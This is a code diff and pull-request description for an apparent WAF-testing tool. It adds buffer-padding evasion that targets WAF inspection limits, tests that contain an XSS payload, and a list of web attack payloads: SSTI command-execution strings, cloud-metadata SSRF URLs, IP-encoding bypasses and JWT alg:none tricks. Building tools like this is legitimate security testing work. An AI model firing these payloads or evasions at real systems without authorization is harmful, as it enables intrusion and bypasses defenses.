+		expect(variations.queryPadding).toContain('attack=%3Cscript%3Ealert(1)%3C%2Fscript%3E');
+		expect(variations.queryPadding.length).toBeGreaterThan(8192);
+
+		expect(variations.bodyPaddingUrlEncoded).toContain('junk=');
+		expect(variations.bodyPaddingUrlEncoded.length).toBeGreaterThan(8192);
+
+		const parsedJson = JSON.parse(variations.bodyPaddingJson);
+		expect(parsedJson.padding.length).toBe(8192);
+		expect(parsedJson.attack).toBe('<script>alert(1)</script>');
+	});
+
+	it('should generate inspection limit padding requests when enabled', () => {
+		const requests = HTTPManipulator.generateManipulatedRequests('http://example.com/api', 'GET', '1=1', {
+			enableInspectionLimitPadding: true,
+			paddingSize: '16kb',
+		});
+
+		expect(requests).toBeInstanceOf(Array);
+		const paddingReqs = requests.filter(r => r.technique === 'WAF Inspection Limit Padding');
+		expect(paddingReqs.length).toBe(3); // 1 GET query, 1 POST urlencoded, 1 POST json
+
+		const getReq = paddingReqs.find(r => r.method === 'GET');
+		expect(getReq?.url).toContain('junk=');
+		expect(getReq?.description).toContain('16kb');
+
+		const postJson = paddingReqs.find(r => r.headers['Content-Type'] === 'application/json');
+		expect(postJson?.body).toBeDefined();
+		const bodyParsed = JSON.parse(postJson?.body || '{}');
+		expect(bodyParsed.padding.length).toBe(16384);
+	});
+
 	it('should execute a manipulated request successfully', async () => {
 		const mockFetch = vi.fn().mockResolvedValue({
 			status: 200,

--- a/packages/worker/src/api.ts
+++ b/packages/worker/src/api.ts
@@ -91,9 +91,9 @@ export default {
 				detectedWAF,
 				(enableHTTPManipulation || enablePadding)
 					? {
-							enableParameterPollution: true,
-							enableVerbTampering: true,
-							enableContentTypeConfusion: true,
+							enableParameterPollution: enableHTTPManipulation,
+							enableVerbTampering: enableHTTPManipulation,
+							enableContentTypeConfusion: enableHTTPManipulation,
 							enableInspectionLimitPadding: enablePadding,
 							paddingSize: paddingSize as any,
 						}

--- a/packages/worker/src/api.ts
+++ b/packages/worker/src/api.ts
@@ -70,6 +70,8 @@ export default {
 			const autoDetectWAF = urlObj.searchParams.get('autoDetectWAF') === '1';
 			const useEncodingVariations = urlObj.searchParams.get('useEncodingVariations') === '1';
 			const enableHTTPManipulation = urlObj.searchParams.get('httpManipulation') === '1';
+			const enablePadding = urlObj.searchParams.get('enablePadding') === '1' || Boolean(urlObj.searchParams.get('paddingSize'));
+			const paddingSize = urlObj.searchParams.get('paddingSize') || '16kb';
 			const detectedWAF = urlObj.searchParams.get('detectedWAF') || bodyDetectedWAF || undefined;
 
 			const results = await handleApiCheckFiltered(
@@ -87,11 +89,13 @@ export default {
 				autoDetectWAF,
 				useEncodingVariations,
 				detectedWAF,
-				enableHTTPManipulation
+				(enableHTTPManipulation || enablePadding)
 					? {
 							enableParameterPollution: true,
 							enableVerbTampering: true,
 							enableContentTypeConfusion: true,
+							enableInspectionLimitPadding: enablePadding,
+							paddingSize: paddingSize as any,
 						}
 					: undefined,
 				{ isWorker: true },

--- a/packages/worker/src/static/index.html
+++ b/packages/worker/src/static/index.html
@@ -265,6 +265,19 @@
 							<input class="form-check-input" type="checkbox" id="httpManipulation" />
 							<label class="form-check-label" for="httpManipulation">HTTP Manipulation</label>
 						</div>
+						<div class="form-check">
+							<input class="form-check-input" type="checkbox" id="enablePadding" onchange="togglePaddingSizeSelect()" />
+							<label class="form-check-label" for="enablePadding">Buffer Padding Evasion</label>
+						</div>
+						<div class="mt-2 w-100" id="paddingSizeWrapper" style="display: none;">
+							<label for="paddingSizeSelect" class="form-label small text-muted mb-1">Padding Size:</label>
+							<select id="paddingSizeSelect" class="form-select form-select-sm">
+								<option value="8kb">8 KB</option>
+								<option value="16kb" selected>16 KB (AWS WAF body limit)</option>
+								<option value="64kb">64 KB</option>
+								<option value="128kb">128 KB (Cloudflare body limit)</option>
+							</select>
+						</div>
 					</div>
 				</div>
 

--- a/packages/worker/src/static/main.js
+++ b/packages/worker/src/static/main.js
@@ -128,6 +128,9 @@ const PAYLOAD_CATEGORIES = [
 	'NoSQL Injection',
 	'Local File Inclusion',
 	'LDAP Injection',
+	'GraphQL Injection',
+	'JWT Attack (Header)',
+	'JWT Attack (Param)',
 	'HTTP Request Smuggling',
 	'Open Redirect',
 	'Sensitive Files',
@@ -141,6 +144,7 @@ const PAYLOAD_CATEGORIES = [
 	'User-Agent',
 	'Prototype Pollution (URL/Param)',
 	'Prototype Pollution (JSON Body)',
+	'WAF Inspection Limit Bypass (Padding)',
 ];
 
 function renderCategoryCheckboxes() {
@@ -252,6 +256,14 @@ function updateDescriptionText() {
 	}
 }
 
+function togglePaddingSizeSelect() {
+	const enablePadding = document.getElementById('enablePadding');
+	const wrapper = document.getElementById('paddingSizeWrapper');
+	if (enablePadding && wrapper) {
+		wrapper.style.display = enablePadding.checked ? 'block' : 'none';
+	}
+}
+
 async function fetchResults() {
 	const btn = document.getElementById('checkBtn');
 	btn.disabled = true;
@@ -286,6 +298,9 @@ async function fetchResults() {
 	const useEncodingVariations = document.getElementById('useEncodingVariations')?.checked ? true : false;
 	// HTTP Manipulation
 	const httpManipulation = document.getElementById('httpManipulation')?.checked ? true : false;
+	// Buffer Padding Evasion
+	const enablePadding = document.getElementById('enablePadding')?.checked ? true : false;
+	const paddingSize = document.getElementById('paddingSizeSelect')?.value || '16kb';
 	// Collect selected categories
 	const categoryCheckboxes = document.querySelectorAll('#categoryCheckboxes input[type=checkbox]');
 	const selectedCategories = Array.from(categoryCheckboxes)
@@ -303,6 +318,8 @@ async function fetchResults() {
 	localStorage.setItem('wafchecker_autoDetectWAF', autoDetectWAF ? '1' : '0');
 	localStorage.setItem('wafchecker_useEncodingVariations', useEncodingVariations ? '1' : '0');
 	localStorage.setItem('wafchecker_httpManipulation', httpManipulation ? '1' : '0');
+	localStorage.setItem('wafchecker_enablePadding', enablePadding ? '1' : '0');
+	localStorage.setItem('wafchecker_paddingSize', paddingSize);
 	// --- Получаем шаблон и заголовки ---\n
 	let payloadTemplate = '';
 	const templateEl = document.getElementById('payloadTemplate');
@@ -356,6 +373,8 @@ async function fetchResults() {
 				autoDetectWAF: autoDetectWAF ? '1' : '0',
 				useEncodingVariations: useEncodingVariations ? '1' : '0',
 				httpManipulation: httpManipulation ? '1' : '0',
+				enablePadding: enablePadding ? '1' : '0',
+				paddingSize: paddingSize,
 				detectedWAF: detectedWAFType || '',
 			});
 			const resp = await fetch(`/api/check?${params.toString()}`, {
@@ -510,6 +529,23 @@ function restoreStateFromLocalStorage() {
 		const el = document.getElementById('httpManipulation');
 		if (el) {
 			el.checked = httpManipulation === '1';
+		}
+	}
+
+	// Buffer Padding Evasion
+	const enablePadding = localStorage.getItem('wafchecker_enablePadding');
+	if (enablePadding !== null) {
+		const el = document.getElementById('enablePadding');
+		if (el) {
+			el.checked = enablePadding === '1';
+			togglePaddingSizeSelect();
+		}
+	}
+	const paddingSize = localStorage.getItem('wafchecker_paddingSize');
+	if (paddingSize !== null) {
+		const el = document.getElementById('paddingSizeSelect');
+		if (el) {
+			el.value = paddingSize;
 		}
 	}
 

--- a/packages/worker/src/static/main.js
+++ b/packages/worker/src/static/main.js
@@ -119,31 +119,39 @@ function renderReport(results, falsePositiveMode = false) {
 }
 
 // --- PAYLOAD CATEGORIES LOGIC ---
+// Ordered by popularity: most common & well-known attacks on top, niche & rare attacks at the bottom
 const PAYLOAD_CATEGORIES = [
+	// Top Most Common & Critical Web Attacks (OWASP Top 10)
 	'SQL Injection',
 	'XSS',
-	'Path Traversal',
 	'Command Injection',
+	'Path Traversal',
 	'SSRF',
-	'NoSQL Injection',
 	'Local File Inclusion',
-	'LDAP Injection',
+	'Sensitive Files',
+	'Open Redirect',
+
+	// Modern Application & API Attacks
+	'SSTI',
+	'XXE',
+	'NoSQL Injection',
 	'GraphQL Injection',
 	'JWT Attack (Header)',
 	'JWT Attack (Param)',
-	'HTTP Request Smuggling',
-	'Open Redirect',
-	'Sensitive Files',
-	'CRLF Injection',
-	'UTF8/Unicode Bypass',
-	'XXE',
-	'SSTI',
-	'HTTP Parameter Pollution',
-	'Web Cache Poisoning',
-	'IP Bypass',
-	'User-Agent',
-	'Prototype Pollution (URL/Param)',
 	'Prototype Pollution (JSON Body)',
+	'Prototype Pollution (URL/Param)',
+
+	// Protocol, Header & Injection Attacks
+	'LDAP Injection',
+	'CRLF Injection',
+	'HTTP Parameter Pollution',
+	'User-Agent',
+	'IP Bypass',
+
+	// Advanced Infrastructure / Evasion / Smuggling Attacks (Rare & Niche)
+	'HTTP Request Smuggling',
+	'Web Cache Poisoning',
+	'UTF8/Unicode Bypass',
 	'WAF Inspection Limit Bypass (Padding)',
 ];
 


### PR DESCRIPTION
## Summary of Changes

### 1. Expanded Vulnerability Categories & Payloads (`packages/core/src/payloads-data/base.ts`)
- **GraphQL Injection (`GraphQL Injection`)**:
  - Introspection queries (`__schema`, `__type`), batching attacks, field alias overloading, directive bypasses (`@deprecated`, `@skip(if: false)`), mutation probes.
  - Added benign `falsePayloads` for accurate false-positive testing.
- **JWT Attacks (`JWT Attack (Header)` & `JWT Attack (Param)`)**:
  - Algorithm confusion / stripping (`"alg": "none"`, `"alg": "NONE"`).
  - Header injections (`jku`, `jwk`, and `kid` directory traversal `../../dev/null`).
  - Available as both HTTP header (`Authorization: Bearer <token>`) and parameter checks.
- **Enhanced SSTI (Server-Side Template Injection)**:
  - Added SpEL (`T(java.lang.Runtime).getRuntime().exec('id')`, `${T(java.lang.System).getenv()}`).
  - Added FreeMarker (`<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}`).
  - Added Mako (`${__import__('os').system('id')}`), Smarty (`{php}phpinfo();{/php}`), Handlebars (`{{#with "s" as |string|}}...{{/with}}`), Pug/Jade (`#{function(){...}()}`), and Twig filters.
- **Enhanced Cloud SSRF**:
  - Google Cloud Metadata (`http://metadata.google.internal/computeMetadata/v1/`).
  - Azure Instance Metadata (`http://169.254.169.254/metadata/instance?api-version=2021-02-01`).
  - Oracle Cloud Metadata (`http://169.254.169.254/opc/v1/instance/`).
  - Alibaba Cloud Metadata (`http://100.100.100.200/latest/meta-data/`).
  - Advanced IP encodings: Hex (`0x7f000001`), Octal (`0177.0.0.1`), Decimal (`2130706433`), IPv6-mapped IPv4 (`[::ffff:127.0.0.1]`), DNS rebinding (`127.0.0.1.nip.io`).

### 2. WAF Inspection Limit Padding Evasion (`packages/core/src/http-manipulation.ts`)
- Added `enableInspectionLimitPadding` & `paddingSize` (`8kb`, `16kb`, `64kb`, `128kb`) to bypass body inspection limit constraints of major WAFs (e.g. AWS WAF 16KB/64KB body inspection limit, Cloudflare 128KB limit).
- Generates query-padding, URL-encoded body padding, and JSON body padding.
- Added static presets in `base.ts` (`WAF Inspection Limit Bypass (Padding)`).

### 3. WAF-Specific Bypasses (`packages/core/src/payloads-data/advanced.ts`)
- Added evasion rules for **Google Cloud Armor**, **Azure Front Door**, and **Imperva**.

### 4. CLI & Web UI Integration
- **CLI (`packages/cli/src/index.ts`)**:
  - Added `--padding <size>` (`8kb`, `16kb`, `64kb`, `128kb`) to both `check` and `batch` commands.
  - Exposed all new categories in help output and `-c, --categories` parser.
- **Web UI (`packages/worker/src/static/index.html` & `main.js`)**:
  - Added checkboxes for `GraphQL Injection`, `JWT Attack (Header)`, `JWT Attack (Param)`, and `WAF Inspection Limit Bypass (Padding)`.
  - Added `Buffer Padding Evasion` checkbox with dynamic size selector (`8 KB`, `16 KB`, `64 KB`, `128 KB`) in Protocol Testing.

### 5. Verification & Tests
- All 177 unit tests in `@waf-checker/core`, `@waf-checker/cli`, and `@waf-checker/worker` passing.
- Test coverage across `packages/core` maintained at **89.25% lines**.